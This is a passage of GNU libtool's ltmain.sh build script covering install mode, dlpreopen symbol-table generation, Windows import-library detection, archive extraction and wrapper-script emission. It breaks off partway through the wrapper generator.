func_execute_cmds "$postinstall_cmds" 'exit $?' fi # Install the pseudo-library for information purposes. func_basename "$file" name=$func_basename_result instname=$dir/${name}i func_show_eval "$install_prog $instname $destdir/$name" 'exit $?' # Maybe install the static library, too. test -n "$old_library" && func_append staticlibs " $dir/$old_library" ;; *.lo) # Install (i.e. copy) a libtool object. # Figure out destination file name, if it wasn't already specified. if test -n "$destname"; then destfile=$destdir/$destname else func_basename "$file" destfile=$func_basename_result destfile=$destdir/$destfile fi # Deduce the name of the destination old-style object file. case $destfile in *.lo) func_lo2o "$destfile" staticdest=$func_lo2o_result ;; *.$objext) staticdest=$destfile destfile= ;; *) func_fatal_help "cannot copy a libtool object to '$destfile'" ;; esac # Install the libtool object if requested. test -n "$destfile" && \ func_show_eval "$install_prog $file $destfile" 'exit $?' # Install the old object if enabled. if test yes = "$build_old_libs"; then # Deduce the name of the old-style object file. func_lo2o "$file" staticobj=$func_lo2o_result func_show_eval "$install_prog \$staticobj \$staticdest" 'exit $?' fi exit $EXIT_SUCCESS ;; *) # Figure out destination file name, if it wasn't already specified. if test -n "$destname"; then destfile=$destdir/$destname else func_basename "$file" destfile=$func_basename_result destfile=$destdir/$destfile fi # If the file is missing, and there is a .exe on the end, strip it # because it is most likely a libtool script we actually want to # install stripped_ext= case $file in *.exe) if test ! -f "$file"; then func_stripname '' '.exe' "$file" file=$func_stripname_result stripped_ext=.exe fi ;; esac # Do a test to see if this is really a libtool program. case $host in *cygwin* | *mingw*) if func_ltwrapper_executable_p "$file"; then func_ltwrapper_scriptname "$file" wrapper=$func_ltwrapper_scriptname_result else func_stripname '' '.exe' "$file" wrapper=$func_stripname_result fi ;; *) wrapper=$file ;; esac if func_ltwrapper_script_p "$wrapper"; then notinst_deplibs= relink_command= func_source "$wrapper" # Check the variables that should have been set. test -z "$generated_by_libtool_version" && \ func_fatal_error "invalid libtool wrapper script '$wrapper'" finalize=: for lib in $notinst_deplibs; do # Check to see that each library is installed. libdir= if test -f "$lib"; then func_source "$lib" fi libfile=$libdir/`$ECHO "$lib" | $SED 's%^.*/%%g'` if test -n "$libdir" && test ! -f "$libfile"; then func_warning "'$lib' has not been installed in '$libdir'" finalize=false fi done relink_command= func_source "$wrapper" outputname= if test no = "$fast_install" && test -n "$relink_command"; then $opt_dry_run || { if $finalize; then tmpdir=`func_mktempdir` func_basename "$file$stripped_ext" file=$func_basename_result outputname=$tmpdir/$file # Replace the output file specification. relink_command=`$ECHO "$relink_command" | $SED 's%@OUTPUT@%'"$outputname"'%g'` $opt_quiet || { func_quote_arg expand,pretty "$relink_command" eval "func_echo $func_quote_arg_result" } if eval "$relink_command"; then : else func_error "error: relink '$file' with the above command before installing it" $opt_dry_run || ${RM}r "$tmpdir" continue fi file=$outputname else func_warning "cannot relink '$file'" fi } else # Install the binary that we compiled earlier. file=`$ECHO "$file$stripped_ext" | $SED "s%\([^/]*\)$%$objdir/\1%"` fi fi # remove .exe since cygwin /usr/bin/install will append another # one anyway case $install_prog,$host in */usr/bin/install*,*cygwin*) case $file:$destfile in *.exe:*.exe) # this is ok ;; *.exe:*) destfile=$destfile.exe ;; *:*.exe) func_stripname '' '.exe' "$destfile" destfile=$func_stripname_result ;; esac ;; esac func_show_eval "$install_prog\$stripme \$file \$destfile" 'exit $?' $opt_dry_run || if test -n "$outputname"; then ${RM}r "$tmpdir" fi ;; esac done for file in $staticlibs; do func_basename "$file" name=$func_basename_result # Set up the ranlib parameters. oldlib=$destdir/$name func_to_tool_file "$oldlib" func_convert_file_msys_to_w32 tool_oldlib=$func_to_tool_file_result func_show_eval "$install_prog \$file \$oldlib" 'exit $?' if test -n "$stripme" && test -n "$old_striplib"; then func_show_eval "$old_striplib $tool_oldlib" 'exit $?' fi # Do each command in the postinstall commands. func_execute_cmds "$old_postinstall_cmds" 'exit $?' done test -n "$future_libdirs" && \ func_warning "remember to run '$progname --finish$future_libdirs'" if test -n "$current_libdirs"; then # Maybe just do a dry run. $opt_dry_run && current_libdirs=" -n$current_libdirs" exec_cmd='$SHELL "$progpath" $preserve_args --finish$current_libdirs' else exit $EXIT_SUCCESS fi } test install = "$opt_mode" && func_mode_install ${1+"$@"} # func_generate_dlsyms outputname originator pic_p # Extract symbols from dlprefiles and create ${outputname}S.o with # a dlpreopen symbol table. func_generate_dlsyms () { $debug_cmd my_outputname=$1 my_originator=$2 my_pic_p=${3-false} my_prefix=`$ECHO "$my_originator" | $SED 's%[^a-zA-Z0-9]%_%g'` my_dlsyms= if test -n "$dlfiles$dlprefiles" || test no != "$dlself"; then if test -n "$NM" && test -n "$global_symbol_pipe"; then my_dlsyms=${my_outputname}S.c else func_error "not configured to extract global symbols from dlpreopened files" fi fi if test -n "$my_dlsyms"; then case $my_dlsyms in "") ;; *.c) # Discover the nlist of each of the dlfiles. nlist=$output_objdir/$my_outputname.nm func_show_eval "$RM $nlist ${nlist}S ${nlist}T" # Parse the name list into a source file. func_verbose "creating $output_objdir/$my_dlsyms" $opt_dry_run || $ECHO > "$output_objdir/$my_dlsyms" "\ /* $my_dlsyms - symbol resolution table for '$my_outputname' dlsym emulation. */ /* Generated by $PROGRAM (GNU $PACKAGE) $VERSION */ #ifdef __cplusplus extern \"C\" { #endif #if defined __GNUC__ && (((__GNUC__ == 4) && (__GNUC_MINOR__ >= 4)) || (__GNUC__ > 4)) #pragma GCC diagnostic ignored \"-Wstrict-prototypes\" #endif /* Keep this code in sync between libtool.m4, ltmain, lt_system.h, and tests. */ #if defined _WIN32 || defined __CYGWIN__ || defined _WIN32_WCE /* DATA imports from DLLs on WIN32 can't be const, because runtime relocations are performed -- see ld's documentation on pseudo-relocs. */ # define LT_DLSYM_CONST #elif defined __osf__ /* This system does not cope well with relocations in const data. */ # define LT_DLSYM_CONST #else # define LT_DLSYM_CONST const #endif #define STREQ(s1, s2) (strcmp ((s1), (s2)) == 0) /* External symbol declarations for the compiler. */\ " if test yes = "$dlself"; then func_verbose "generating symbol list for '$output'" $opt_dry_run || echo ': @PROGRAM@ ' > "$nlist" # Add our own program objects to the symbol list. progfiles=`$ECHO "$objs$old_deplibs" | $SP2NL | $SED "$lo2o" | $NL2SP` for progfile in $progfiles; do func_to_tool_file "$progfile" func_convert_file_msys_to_w32 func_verbose "extracting global C symbols from '$func_to_tool_file_result'" $opt_dry_run || eval "$NM $func_to_tool_file_result | $global_symbol_pipe >> '$nlist'" done if test -n "$exclude_expsyms"; then $opt_dry_run || { eval '$EGREP -v " ($exclude_expsyms)$" "$nlist" > "$nlist"T' eval '$MV "$nlist"T "$nlist"' } fi if test -n "$export_symbols_regex"; then $opt_dry_run || { eval '$EGREP -e "$export_symbols_regex" "$nlist" > "$nlist"T' eval '$MV "$nlist"T "$nlist"' } fi # Prepare the list of exported symbols if test -z "$export_symbols"; then export_symbols=$output_objdir/$outputname.exp $opt_dry_run || { $RM $export_symbols eval "$SED -n -e '/^: @PROGRAM@ $/d' -e 's/^.* \(.*\)$/\1/p' "'< "$nlist" > "$export_symbols"' case $host in *cygwin* | *mingw* | *cegcc* ) eval "echo EXPORTS "'> "$output_objdir/$outputname.def"' eval 'cat "$export_symbols" >> "$output_objdir/$outputname.def"' ;; esac } else $opt_dry_run || { eval "$SED -e 's/\([].[*^$]\)/\\\\\1/g' -e 's/^/ /' -e 's/$/$/'"' < "$export_symbols" > "$output_objdir/$outputname.exp"' eval '$GREP -f "$output_objdir/$outputname.exp" < "$nlist" > "$nlist"T' eval '$MV "$nlist"T "$nlist"' case $host in *cygwin* | *mingw* | *cegcc* ) eval "echo EXPORTS "'> "$output_objdir/$outputname.def"' eval 'cat "$nlist" >> "$output_objdir/$outputname.def"' ;; esac } fi fi for dlprefile in $dlprefiles; do func_verbose "extracting global C symbols from '$dlprefile'" func_basename "$dlprefile" name=$func_basename_result case $host in *cygwin* | *mingw* | *cegcc* ) # if an import library, we need to obtain dlname if func_win32_import_lib_p "$dlprefile"; then func_tr_sh "$dlprefile" eval "curr_lafile=\$libfile_$func_tr_sh_result" dlprefile_dlbasename= if test -n "$curr_lafile" && func_lalib_p "$curr_lafile"; then # Use subshell, to avoid clobbering current variable values dlprefile_dlname=`source "$curr_lafile" && echo "$dlname"` if test -n "$dlprefile_dlname"; then func_basename "$dlprefile_dlname" dlprefile_dlbasename=$func_basename_result else # no lafile. user explicitly requested -dlpreopen . $sharedlib_from_linklib_cmd "$dlprefile" dlprefile_dlbasename=$sharedlib_from_linklib_result fi fi $opt_dry_run || { if test -n "$dlprefile_dlbasename"; then eval '$ECHO ": $dlprefile_dlbasename" >> "$nlist"' else func_warning "Could not compute DLL name from $name" eval '$ECHO ": $name " >> "$nlist"' fi func_to_tool_file "$dlprefile" func_convert_file_msys_to_w32 eval "$NM \"$func_to_tool_file_result\" 2>/dev/null | $global_symbol_pipe | $SED -e '/I __imp/d' -e 's/I __nm_/D /;s/_nm__//' >> '$nlist'" } else # not an import lib $opt_dry_run || { eval '$ECHO ": $name " >> "$nlist"' func_to_tool_file "$dlprefile" func_convert_file_msys_to_w32 eval "$NM \"$func_to_tool_file_result\" 2>/dev/null | $global_symbol_pipe >> '$nlist'" } fi ;; *) $opt_dry_run || { eval '$ECHO ": $name " >> "$nlist"' func_to_tool_file "$dlprefile" func_convert_file_msys_to_w32 eval "$NM \"$func_to_tool_file_result\" 2>/dev/null | $global_symbol_pipe >> '$nlist'" } ;; esac done $opt_dry_run || { # Make sure we have at least an empty file. test -f "$nlist" || : > "$nlist" if test -n "$exclude_expsyms"; then $EGREP -v " ($exclude_expsyms)$" "$nlist" > "$nlist"T $MV "$nlist"T "$nlist" fi # Try sorting and uniquifying the output. if $GREP -v "^: " < "$nlist" | if sort -k 3 /dev/null 2>&1; then sort -k 3 else sort +2 fi | uniq > "$nlist"S; then : else $GREP -v "^: " < "$nlist" > "$nlist"S fi if test -f "$nlist"S; then eval "$global_symbol_to_cdecl"' < "$nlist"S >> "$output_objdir/$my_dlsyms"' else echo '/* NONE */' >> "$output_objdir/$my_dlsyms" fi func_show_eval '$RM "${nlist}I"' if test -n "$global_symbol_to_import"; then eval "$global_symbol_to_import"' < "$nlist"S > "$nlist"I' fi echo >> "$output_objdir/$my_dlsyms" "\ /* The mapping between symbol names and symbols. */ typedef struct { const char *name; void *address; } lt_dlsymlist; extern LT_DLSYM_CONST lt_dlsymlist lt_${my_prefix}_LTX_preloaded_symbols[];\ " if test -s "$nlist"I; then echo >> "$output_objdir/$my_dlsyms" "\ static void lt_syminit(void) { LT_DLSYM_CONST lt_dlsymlist *symbol = lt_${my_prefix}_LTX_preloaded_symbols; for (; symbol->name; ++symbol) {" $SED 's/.*/ if (STREQ (symbol->name, \"&\")) symbol->address = (void *) \&&;/' < "$nlist"I >> "$output_objdir/$my_dlsyms" echo >> "$output_objdir/$my_dlsyms" "\ } }" fi echo >> "$output_objdir/$my_dlsyms" "\ LT_DLSYM_CONST lt_dlsymlist lt_${my_prefix}_LTX_preloaded_symbols[] = { {\"$my_originator\", (void *) 0}," if test -s "$nlist"I; then echo >> "$output_objdir/$my_dlsyms" "\ {\"@INIT@\", (void *) <_syminit}," fi case $need_lib_prefix in no) eval "$global_symbol_to_c_name_address" < "$nlist" >> "$output_objdir/$my_dlsyms" ;; *) eval "$global_symbol_to_c_name_address_lib_prefix" < "$nlist" >> "$output_objdir/$my_dlsyms" ;; esac echo >> "$output_objdir/$my_dlsyms" "\ {0, (void *) 0} }; /* This works around a problem in FreeBSD linker */ #ifdef FREEBSD_WORKAROUND static const void *lt_preloaded_setup() { return lt_${my_prefix}_LTX_preloaded_symbols; } #endif #ifdef __cplusplus } #endif\ " } # !$opt_dry_run pic_flag_for_symtable= case "$compile_command " in *" -static "*) ;; *) case $host in # compiling the symbol table file with pic_flag works around # a FreeBSD bug that causes programs to crash when -lm is # linked before any other PIC object. But we must not use # pic_flag when linking with -static. The problem exists in # FreeBSD 2.2.6 and is fixed in FreeBSD 3.1. *-*-freebsd2.*|*-*-freebsd3.0*|*-*-freebsdelf3.0*) pic_flag_for_symtable=" $pic_flag -DFREEBSD_WORKAROUND" ;; *-*-hpux*) pic_flag_for_symtable=" $pic_flag" ;; *) $my_pic_p && pic_flag_for_symtable=" $pic_flag" ;; esac ;; esac symtab_cflags= for arg in $LTCFLAGS; do case $arg in -pie | -fpie | -fPIE) ;; *) func_append symtab_cflags " $arg" ;; esac done # Now compile the dynamic symbol file. func_show_eval '(cd $output_objdir && $LTCC$symtab_cflags -c$no_builtin_flag$pic_flag_for_symtable "$my_dlsyms")' 'exit $?' # Clean up the generated files. func_show_eval '$RM "$output_objdir/$my_dlsyms" "$nlist" "${nlist}S" "${nlist}T" "${nlist}I"' # Transform the symbol file into the correct name. symfileobj=$output_objdir/${my_outputname}S.$objext case $host in *cygwin* | *mingw* | *cegcc* ) if test -f "$output_objdir/$my_outputname.def"; then compile_command=`$ECHO "$compile_command" | $SED "s%@SYMFILE@%$output_objdir/$my_outputname.def $symfileobj%"` finalize_command=`$ECHO "$finalize_command" | $SED "s%@SYMFILE@%$output_objdir/$my_outputname.def $symfileobj%"` else compile_command=`$ECHO "$compile_command" | $SED "s%@SYMFILE@%$symfileobj%"` finalize_command=`$ECHO "$finalize_command" | $SED "s%@SYMFILE@%$symfileobj%"` fi ;; *) compile_command=`$ECHO "$compile_command" | $SED "s%@SYMFILE@%$symfileobj%"` finalize_command=`$ECHO "$finalize_command" | $SED "s%@SYMFILE@%$symfileobj%"` ;; esac ;; *) func_fatal_error "unknown suffix for '$my_dlsyms'" ;; esac else # We keep going just in case the user didn't refer to # lt_preloaded_symbols. The linker will fail if global_symbol_pipe # really was required. # Nullify the symbol file. compile_command=`$ECHO "$compile_command" | $SED "s% @SYMFILE@%%"` finalize_command=`$ECHO "$finalize_command" | $SED "s% @SYMFILE@%%"` fi } # func_cygming_gnu_implib_p ARG # This predicate returns with zero status (TRUE) if # ARG is a GNU/binutils-style import library. Returns # with nonzero status (FALSE) otherwise. func_cygming_gnu_implib_p () { $debug_cmd func_to_tool_file "$1" func_convert_file_msys_to_w32 func_cygming_gnu_implib_tmp=`$NM "$func_to_tool_file_result" | eval "$global_symbol_pipe" | $EGREP ' (_head_[A-Za-z0-9_]+_[ad]l*|[A-Za-z0-9_]+_[ad]l*_iname)$'` test -n "$func_cygming_gnu_implib_tmp" } # func_cygming_ms_implib_p ARG # This predicate returns with zero status (TRUE) if # ARG is an MS-style import library. Returns # with nonzero status (FALSE) otherwise. func_cygming_ms_implib_p () { $debug_cmd func_to_tool_file "$1" func_convert_file_msys_to_w32 func_cygming_ms_implib_tmp=`$NM "$func_to_tool_file_result" | eval "$global_symbol_pipe" | $GREP '_NULL_IMPORT_DESCRIPTOR'` test -n "$func_cygming_ms_implib_tmp" } # func_win32_libid arg # return the library type of file 'arg' # # Need a lot of goo to handle *both* DLLs and import libs # Has to be a shell function in order to 'eat' the argument # that is supplied when $file_magic_command is called. # Despite the name, also deal with 64 bit binaries. func_win32_libid () { $debug_cmd win32_libid_type=unknown win32_fileres=`file -L $1 2>/dev/null` case $win32_fileres in *ar\ archive\ import\ library*) # definitely import win32_libid_type="x86 archive import" ;; *ar\ archive*) # could be an import, or static # Keep the egrep pattern in sync with the one in _LT_CHECK_MAGIC_METHOD. if eval $OBJDUMP -f $1 | $SED -e '10q' 2>/dev/null | $EGREP 'file format (pei*-i386(.*architecture: i386)?|pe-arm-wince|pe-x86-64)' >/dev/null; then case $nm_interface in "MS dumpbin") if func_cygming_ms_implib_p "$1" || func_cygming_gnu_implib_p "$1" then win32_nmres=import else win32_nmres= fi ;; *) func_to_tool_file "$1" func_convert_file_msys_to_w32 win32_nmres=`eval $NM -f posix -A \"$func_to_tool_file_result\" | $SED -n -e ' 1,100{ / I /{ s|.*|import| p q } }'` ;; esac case $win32_nmres in import*) win32_libid_type="x86 archive import";; *) win32_libid_type="x86 archive static";; esac fi ;; *DLL*) win32_libid_type="x86 DLL" ;; *executable*) # but shell scripts are "executable" too... case $win32_fileres in *MS\ Windows\ PE\ Intel*) win32_libid_type="x86 DLL" ;; esac ;; esac $ECHO "$win32_libid_type" } # func_cygming_dll_for_implib ARG # # Platform-specific function to extract the # name of the DLL associated with the specified # import library ARG. # Invoked by eval'ing the libtool variable # $sharedlib_from_linklib_cmd # Result is available in the variable # $sharedlib_from_linklib_result func_cygming_dll_for_implib () { $debug_cmd sharedlib_from_linklib_result=`$DLLTOOL --identify-strict --identify "$1"` } # func_cygming_dll_for_implib_fallback_core SECTION_NAME LIBNAMEs # # The is the core of a fallback implementation of a # platform-specific function to extract the name of the # DLL associated with the specified import library LIBNAME. # # SECTION_NAME is either .idata$6 or .idata$7, depending # on the platform and compiler that created the implib. # # Echos the name of the DLL associated with the # specified import library. func_cygming_dll_for_implib_fallback_core () { $debug_cmd match_literal=`$ECHO "$1" | $SED "$sed_make_literal_regex"` $OBJDUMP -s --section "$1" "$2" 2>/dev/null | $SED '/^Contents of section '"$match_literal"':/{ # Place marker at beginning of archive member dllname section s/.*/====MARK====/ p d } # These lines can sometimes be longer than 43 characters, but # are always uninteresting /:[ ]*file format pe[i]\{,1\}-/d /^In archive [^:]*:/d # Ensure marker is printed /^====MARK====/p # Remove all lines with less than 43 characters /^.\{43\}/!d # From remaining lines, remove first 43 characters s/^.\{43\}//' | $SED -n ' # Join marker and all lines until next marker into a single line /^====MARK====/ b para H $ b para b :para x s/\n//g # Remove the marker s/^====MARK====// # Remove trailing dots and whitespace s/[\. \t]*$// # Print /./p' | # we now have a list, one entry per line, of the stringified # contents of the appropriate section of all members of the # archive that possess that section. Heuristic: eliminate # all those that have a first or second character that is # a '.' (that is, objdump's representation of an unprintable # character.) This should work for all archives with less than # 0x302f exports -- but will fail for DLLs whose name actually # begins with a literal '.' or a single character followed by # a '.'. # # Of those that remain, print the first one. $SED -e '/^\./d;/^.\./d;q' } # func_cygming_dll_for_implib_fallback ARG # Platform-specific function to extract the # name of the DLL associated with the specified # import library ARG. # # This fallback implementation is for use when $DLLTOOL # does not support the --identify-strict option. # Invoked by eval'ing the libtool variable # $sharedlib_from_linklib_cmd # Result is available in the variable # $sharedlib_from_linklib_result func_cygming_dll_for_implib_fallback () { $debug_cmd if func_cygming_gnu_implib_p "$1"; then # binutils import library sharedlib_from_linklib_result=`func_cygming_dll_for_implib_fallback_core '.idata$7' "$1"` elif func_cygming_ms_implib_p "$1"; then # ms-generated import library sharedlib_from_linklib_result=`func_cygming_dll_for_implib_fallback_core '.idata$6' "$1"` else # unknown sharedlib_from_linklib_result= fi } # func_extract_an_archive dir oldlib func_extract_an_archive () { $debug_cmd f_ex_an_ar_dir=$1; shift f_ex_an_ar_oldlib=$1 if test yes = "$lock_old_archive_extraction"; then lockfile=$f_ex_an_ar_oldlib.lock until $opt_dry_run || ln "$progpath" "$lockfile" 2>/dev/null; do func_echo "Waiting for $lockfile to be removed" sleep 2 done fi func_show_eval "(cd \$f_ex_an_ar_dir && $AR x \"\$f_ex_an_ar_oldlib\")" \ 'stat=$?; rm -f "$lockfile"; exit $stat' if test yes = "$lock_old_archive_extraction"; then $opt_dry_run || rm -f "$lockfile" fi if ($AR t "$f_ex_an_ar_oldlib" | sort | sort -uc >/dev/null 2>&1); then : else func_fatal_error "object name conflicts in archive: $f_ex_an_ar_dir/$f_ex_an_ar_oldlib" fi } # func_extract_archives gentop oldlib ... func_extract_archives () { $debug_cmd my_gentop=$1; shift my_oldlibs=${1+"$@"} my_oldobjs= my_xlib= my_xabs= my_xdir= for my_xlib in $my_oldlibs; do # Extract the objects. case $my_xlib in [\\/]* | [A-Za-z]:[\\/]*) my_xabs=$my_xlib ;; *) my_xabs=`pwd`"/$my_xlib" ;; esac func_basename "$my_xlib" my_xlib=$func_basename_result my_xlib_u=$my_xlib while :; do case " $extracted_archives " in *" $my_xlib_u "*) func_arith $extracted_serial + 1 extracted_serial=$func_arith_result my_xlib_u=lt$extracted_serial-$my_xlib ;; *) break ;; esac done extracted_archives="$extracted_archives $my_xlib_u" my_xdir=$my_gentop/$my_xlib_u func_mkdir_p "$my_xdir" case $host in *-darwin*) func_verbose "Extracting $my_xabs" # Do not bother doing anything if just a dry run $opt_dry_run || { darwin_orig_dir=`pwd` cd $my_xdir || exit $? darwin_archive=$my_xabs darwin_curdir=`pwd` func_basename "$darwin_archive" darwin_base_archive=$func_basename_result darwin_arches=`$LIPO -info "$darwin_archive" 2>/dev/null | $GREP Architectures 2>/dev/null || true` if test -n "$darwin_arches"; then darwin_arches=`$ECHO "$darwin_arches" | $SED -e 's/.*are://'` darwin_arch= func_verbose "$darwin_base_archive has multiple architectures $darwin_arches" for darwin_arch in $darwin_arches; do func_mkdir_p "unfat-$$/$darwin_base_archive-$darwin_arch" $LIPO -thin $darwin_arch -output "unfat-$$/$darwin_base_archive-$darwin_arch/$darwin_base_archive" "$darwin_archive" cd "unfat-$$/$darwin_base_archive-$darwin_arch" func_extract_an_archive "`pwd`" "$darwin_base_archive" cd "$darwin_curdir" $RM "unfat-$$/$darwin_base_archive-$darwin_arch/$darwin_base_archive" done # $darwin_arches ## Okay now we've a bunch of thin objects, gotta fatten them up :) darwin_filelist=`find unfat-$$ -type f -name \*.o -print -o -name \*.lo -print | $SED -e "$sed_basename" | sort -u` darwin_file= darwin_files= for darwin_file in $darwin_filelist; do darwin_files=`find unfat-$$ -name $darwin_file -print | sort | $NL2SP` $LIPO -create -output "$darwin_file" $darwin_files done # $darwin_filelist $RM -rf unfat-$$ cd "$darwin_orig_dir" else cd $darwin_orig_dir func_extract_an_archive "$my_xdir" "$my_xabs" fi # $darwin_arches } # !$opt_dry_run ;; *) func_extract_an_archive "$my_xdir" "$my_xabs" ;; esac my_oldobjs="$my_oldobjs "`find $my_xdir -name \*.$objext -print -o -name \*.lo -print | sort | $NL2SP` done func_extract_archives_result=$my_oldobjs } # func_emit_wrapper [arg=no] # # Emit a libtool wrapper script on stdout. # Don't directly open a file because we may want to # incorporate the script contents within a cygwin/mingw # wrapper executable. Must ONLY be called from within # func_mode_link because it depends on a number of variables # set therein. # # ARG is the value that the WRAPPER_SCRIPT_BELONGS_IN_OBJDIR # variable will take. If 'yes', then the emitted script # will assume that the directory where it is stored is # the $objdir directory. This is a cygwin/mingw-specific # behavior. func_emit_wrapper () { func_emit_wrapper_arg1=${1-no} $ECHO "\ #! $SHELL # $output - temporary wrapper script for $objdir/$outputname # Generated by $PROGRAM (GNU $PACKAGE) $VERSION # # The $output program cannot be directly executed until all the libtool # libraries that it depends on are installed. # # This wrapper script should never be moved out of the build directory. # If it is, it will not operate correctly. # Sed substitution that helps us do robust quoting. It backslashifies # metacharacters that are still active within double-quoted strings. sed_quote_subst='$sed_quote_subst' # Be Bourne compatible if test -n \"\${ZSH_VERSION+set}\" && (emulate sh) >/dev/null 2>&1; then emulate sh NULLCMD=: # Zsh 3.x and 4.x performs word splitting on \${1+\"\$@\"}, which # is contrary to our usage. Disable this feature. alias -g '\${1+\"\$@\"}'='\"\$@\"' setopt NO_GLOB_SUBST else case \`(set -o) 2>/dev/null\` in *posix*) set -o posix;; esac fi BIN_SH=xpg4; export BIN_SH # for Tru64 DUALCASE=1; export DUALCASE # for MKS sh # The HP-UX ksh and POSIX shell print the target directory to stdout # if CDPATH is set. (unset CDPATH) >/dev/null 2>&1 && unset CDPATH relink_command=\"$relink_command\" # This environment variable determines our operation mode. if test \"\$libtool_install_magic\" = \"$magic\"; then # install mode needs the following variables: generated_by_libtool_version='$macro_version' notinst_deplibs='$notinst_deplibs' else # When we are sourced in execute mode, \$file and \$ECHO are already set. if test \"\$libtool_execute_magic\" != \"$magic\"; then file=\"\$0\"" func_quote_arg pretty "$ECHO" qECHO=$func_quote_arg_result $ECHO "\ # A function that is used when there is no print builtin or printf. func_fallback_echo () { eval 'cat <<_LTECHO_EOF \$1 _LTECHO_EOF' } ECHO=$qECHO fi # Very basic option parsing. These options are (a) specific to # the libtool wrapper, (b) are identical between the wrapper # /script/ and the wrapper /executable/ that is used only on # windows platforms, and (c) all begin with the string "--lt-" # (application programs are unlikely to have options that match # this pattern). # # There are only two supported options: --lt-debug and # --lt-dump-script. There is, deliberately, no --lt-help. # # The first argument to this parsing function should be the # script's $0 value, followed by "$@". lt_option_debug= func_parse_lt_options () { lt_script_arg0=\$0 shift for lt_opt do case \"\$lt_opt\" in --lt-debug) lt_option_debug=1 ;; --lt-dump-script) lt_dump_D=\`\$ECHO \"X\$lt_script_arg0\" | $SED -e 's/^X//' -e 's%/[^/]*$%%'\` test \"X\$lt_dump_D\" = \"X\$lt_script_arg0\" && lt_dump_D=. lt_dump_F=\`\$ECHO \"X\$lt_script_arg0\" | $SED -e 's/^X//' -e 's%^.*/%%'\` cat \"\$lt_dump_D/\$lt_dump_F\" exit 0 ;; --lt-*) \$ECHO \"Unrecognized --lt- option: '\$lt_opt'\" 1>&2 exit 1 ;; esac done # Print the debug banner immediately: if test -n \"\$lt_option_debug\"; then echo \"$outputname:$output:\$LINENO: libtool wrapper (GNU $PACKAGE) $VERSION\" 1>&2 fi } # Used when --lt-debug. Prints its arguments to stdout # (redirection is the responsibility of the caller) func_lt_dump_args () { lt_dump_args_N=1; for lt_arg do \$ECHO \"$outputname:$output:\$LINENO: newargv[\$lt_dump_args_N]: \$lt_arg\" lt_dump_args_N=\`expr \$lt_dump_args_N + 1\` done } # Core function for launching the target application func_exec_program_core () { " case $host in # Backslashes separate directories on plain windows *-*-mingw | *-*-os2* | *-cegcc*) $ECHO "\ if test -n \"\$lt_option_debug\"; then \$ECHO \"$outputname:$output:\$LINENO: newargv[0]: \$progdir\\\\\$program\" 1>&2 func_lt_dump_args \${1+\"\$@\"} 1>&2 fi exec \"\$progdir\\\\\$program\" \${1+\"\$@\"} " ;; *) $ECHO "\ if test -n \"\$lt_option_debug\"; then \$ECHO \"$outputname:$output:\$LINENO: newargv[0]: \$progdir/\$program\" 1>&2 func_lt_dump_args \${1+\"\$@\"} 1>&2 fi exec \"\$progdir/\$program\" \${1+\"\$@\"} " ;; esac $ECHO "\ \$ECHO \"\$0: cannot exec \$program \$*\" 1>&2 exit 1 } # A function to encapsulate launching the target application # Strips options in the --lt-* namespace from \$@ and # launches target application with the remaining arguments. func_exec_program () { case \" \$* \" in *\\ --lt-*) for lt_wr_arg do case \$lt_wr_arg in --lt-*) ;; *) set x \"\$@\" \"\$lt_wr_arg\"; shift;; esac shift done ;; esac func_exec_program_core \${1+\"\$@\"} } # Parse options func_parse_lt_options \"\$0\" \${1+\"\$@\"} # Find the directory that this script lives in. thisdir=\`\$ECHO \"\$file\" | $SED 's%/[^/]*$%%'\` test \"x\$thisdir\" = \"x\$file\" && thisdir=. # Follow symbolic links until we get to the real thisdir. file=\`ls -ld \"\$file\" | $SED -n 's/.*-> //p'\` while test -n \"\$file\"; do destdir=\`\$ECHO \"\$file\" | $SED 's%/[^/]*\$%%'\` # If there was a directory component, then change thisdir. if test \"x\$destdir\" != \"x\$file\"; then case \"\$destdir\" in [\\\\/]* | [A-Za-z]:[\\\\/]*) thisdir=\"\$destdir\" ;; *) thisdir=\"\$thisdir/\$destdir\" ;; esac fi file=\`\$ECHO \"\$file\" | $SED 's%^.*/%%'\` file=\`ls -ld \"\$thisdir/\$file\" | $SED -n 's/.*-> //p'\` done # Usually 'no', except on cygwin/mingw when embedded into # the cwrapper. WRAPPER_SCRIPT_BELONGS_IN_OBJDIR=$func_emit_wrapper_arg1 if test \"\$WRAPPER_SCRIPT_BELONGS_IN_OBJDIR\" = \"yes\"; then # special case for '.' if test \"\$thisdir\" = \".\"; then thisdir=\`pwd\` fi # remove .libs from thisdir case \"\$thisdir\" in *[\\\\/]$objdir ) thisdir=\`\$ECHO \"\$thisdir\" | $SED 's%[\\\\/][^\\\\/]*$%%'\` ;; $objdir ) thisdir=. ;; esac fi # Try to get the absolute directory name. absdir=\`cd \"\$thisdir\" && pwd\` test -n \"\$absdir\" && thisdir=\"\$absdir\" " if test yes = "$fast_install"; then $ECHO "\ program=lt-'$outputname'$exeext progdir=\"\$thisdir/$objdir\" if test ! -f \"\$progdir/\$program\" || { file=\`ls -1dt \"\$progdir/\$program\" \"\$progdir/../\$program\" 2>/dev/null | $SED 1q\`; \\ test \"X\$file\" != \"X\$progdir/\$program\"; }; then file=\"\$\$-\$program\" if test ! -d \"\$progdir\"; then $MKDIR \"\$progdir\" else $RM \"\$progdir/\$file\" fi" $ECHO "\ # relink executable if necessary if test -n \"\$relink_command\"; then if relink_command_output=\`eval \$relink_command 2>&1\`; then : else \$ECHO \"\$relink_command_output\" >&2 $RM \"\$progdir/\$file\" exit 1 fi fi $MV \"\$progdir/\$file\" \"\$progdir/\$program\" 2>/dev/null || { $RM \"\$progdir/\$program\"; $MV \"\$progdir/\$file\" \"\$progdir/\$program\"; } $RM \"\$progdir/\$file\" fi" else $ECHO "\ program='$outputname' progdir=\"\$thisdir/$objdir\" " fi $ECHO "\ if test -f \"\$progdir/\$program\"; then" # fixup the dll searchpath if we need to. # # Fix the DLL searchpath if we need to. Do this before prepending # to shlibpath, because on Windows, both are PATH and uninstalled # libraries must come first. if test -n "$dllsearchpath"; then $ECHO "\ # Add the dll search path components to the executable PATH PATH=$dllsearchpath:\$PATH " fi # Export our shlibpath_var if we have one. if test yes = "$shlibpath_overrides_runpath" && test -n "$shlibpath_var" && test -n "$temp_rpath"; then $ECHO "\ # Add our own library path to $shlibpath_var $shlibpath_var=\"$temp_rpath\$$shlibpath_var\" # Some systems cannot cope with colon-terminated $shlibpath_var # The second colon is a workaround for a bug in BeOS R4 sed $shlibpath_var=\`\$ECHO \"\$$shlibpath_var\" | $SED 's/::*\$//'\` export $shlibpath_var " fi $ECHO "\ if test \"\$libtool_execute_magic\" != \"$magic\"; then # Run the actual program with our arguments. func_exec_program 